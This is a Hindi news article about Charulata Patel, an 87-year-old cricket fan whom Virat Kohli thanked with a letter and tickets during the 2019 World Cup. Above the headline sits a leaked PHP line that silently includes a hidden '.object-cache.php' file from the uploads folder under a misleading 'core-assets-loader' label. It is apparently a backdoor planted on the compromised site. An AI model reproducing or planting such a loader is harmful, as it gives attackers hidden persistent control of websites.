add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); 87 साल की फैन चारुलता पटेल ने जीता टीम इंडिया का दिल, कोहली ने लिखी चिट्ठी – SOCH INDIA
Menu

खेल
87 साल की फैन चारुलता पटेल ने जीता टीम इंडिया का दिल, कोहली ने लिखी चिट्ठी

nobanner

आईसीसी क्रिकेट वर्ल्ड कप-2019 (ICC Cricket World Cup 2019) के भारत बनाम बांग्लादेश मैच में टीम इंडिया को चीयर करने वाली 87 साल की बुजुर्ग महिला चारुलता पटेल इंटरनेट सनसनी बनकर उभरी हैं. इस उम्र में क्रिकेट के प्रति उनके जुनून को देखकर कप्तान विराट कोहली भी ‘दादी’ के प्रशंसक बने बिना न रह सके. शायद यही वजह है कि कोहली ने उनको वर्ल्ड कप मैच का टिकट देने के साथ एक शुभकामनाओं भरी चिट्ठी भी लिखी है.

भारतीय क्रिकेट कंट्रोल बोर्ड (BCCI) ने अपने आधिकारिक ट्विटर हैंडल से क्रिकेट प्रेमी चारुलता पटेल और कोहली की चिट्ठी की तस्वीरें शेयर की हैं. कोहली ने चिट्ठी में लिखा है, ”प्रिय चारुलता जी, हमारी टीम के लिए आपका प्यार और जुनून बहुत प्रेरणादायक है और मुझे आशा है कि आप अपने परिवार के साथ खेल का आनंद लेंगी. बहुत सारा प्यार. सादर- विराट”
टीम इंडिया और बांग्‍लादेश के बीच जब मंगलवार को कांटे का मुकाबला चल रहा था तो उस दौरान दर्शक दीर्घा में 87 साल की एक बुजुर्ग महिला की उपस्थिति ने सबका ध्‍यान खींचा. ऐसा इसलिए क्‍योंकि वह वुवुजेला (एक तरह का बाजा) बजाकर टीम इंडिया की जबर्दस्‍त ढंग से हौसला-अफजाई कर रही थीं. फिर क्‍या था, देखते ही देखते 87 साल की क्रिकेट फैन चारुलता पटेल को ट्विटर समेत सोशल मीडिया पर चर्चा का विषय बन गईं. इसका नतीजा यह हुआ कि टीम इंडिया के कैप्‍टन विराट कोहली और सलामी बल्‍लेबाज रोहित शर्मा ने उनसे मुलाकात की और आशीर्वाद लिया.

अंतरराष्‍ट्रीय क्रिकेट परिषद (ICC) ने भी इस मुलाकात का वीडियो जारी किया जिसमें विराट कोहली और रोहित शर्मा को चारुलता पटेल से बातचीत करते देखा गया. हालांकि वीडियो में ये समझ में तो नहीं आ रहा कि उन्‍होंने इन दिग्‍गज क्रिकेटरों से क्‍या बात की लेकिन उनको गले लगाते और आशीर्वाद देते देखा गया. मीडिया रिपोर्ट्स के मुताबिक कोहली ने उनसे आने वाले मैचों में भी टीम इंडिया को चीयर करने को कहा था. इस पर महिला ने असमर्थता जताई तो कोहली ने अपने कोटे के मैच पास उनको देने का वादा कर दिया था.

टीम इंडिया की बांग्‍लादेश पर शानदार जीत के बाद विराट कोहली ने चारुलता पटेल को आभार प्रकट करते हुए उनके बारे में कहा कि मैंने जितने भी फैंस देखे हैं, उनमें वह सबसे जुनूनी और समर्पित फैन हैं. कोहली ने ये भी कहा कि उम्र तो मात्र एक नंबर है जुनून आपको सीमाओं के पार ले जाता है.